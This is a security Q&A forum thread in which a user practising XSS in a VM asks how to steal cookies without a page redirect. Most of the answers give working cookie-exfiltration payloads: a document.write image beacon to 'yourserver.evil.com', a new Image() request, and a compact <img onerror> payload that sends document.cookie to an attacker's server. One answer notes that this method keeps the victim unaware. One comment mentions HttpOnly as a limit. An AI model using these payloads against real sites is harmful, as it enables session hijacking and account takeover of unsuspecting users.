XSS cookie stealing without redirecting to another page

  • I'm practicing in VM following the OWASP guide. I know that is possible to steal the cookie by redirecting to "False" page etc. but I would like to steal the cookie without redirecting on another page.

    So, if you have some guestbook and then you put:

    document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
    

    How can I put this into existing page without redirecting?

    Basically, what I want is when someone clicks on the link, grab the cookie and print it somewhere on the current page. Maybe in some alt tag or whatever.

    Any ideas?

    Google changed the way cookies are written. I can't get session cookies using the above method.

  • If you have full control of the JavaScript getting written to the page then you could just do

    document.write('cookie: ' + document.cookie)

    If you want it sent to another server, you could include it in a non-existent image:

    document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')

    The key here being whether you can output arbitrary JavaScript or whether you're limited in the kind of JavaScript you can get executed. Though if you're limited in what can be output you could use more advanced methods of getting your custom code to execute which are a bit out of scope of the question.

    And you can even request it without writing to `document`: `image = new Image(); image.src='http://example.com?c='+document.cookie;`

    I cannot edit your post but there is a missing quote, `/>)` should be `/>')`. Thanks anyway excellent answer

    This should not the case if the cookie is marked with the HttpOnly attribute.

  • To add onto Steve's answer, there are many different ways to achieve this. If your intention is to not have the user be aware of the stolen cookie, I would suggest the <img> attack Steve suggested. Although I prefer avoiding the document.write since it uses up so many characters:

    <img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
    

    This is nice and compact, but the problem is that it will recursively trigger the `onerror` handler unless an image is served from the attacker's page.

    I uses this approach but as the source you can use an existing image and use the `onload` attribute for the payload: `https://github.com/favicon.ico" width="0" height="0">`

License under CC-BY-SA with attribution


Content dated before 6/26/2020 9:53 AM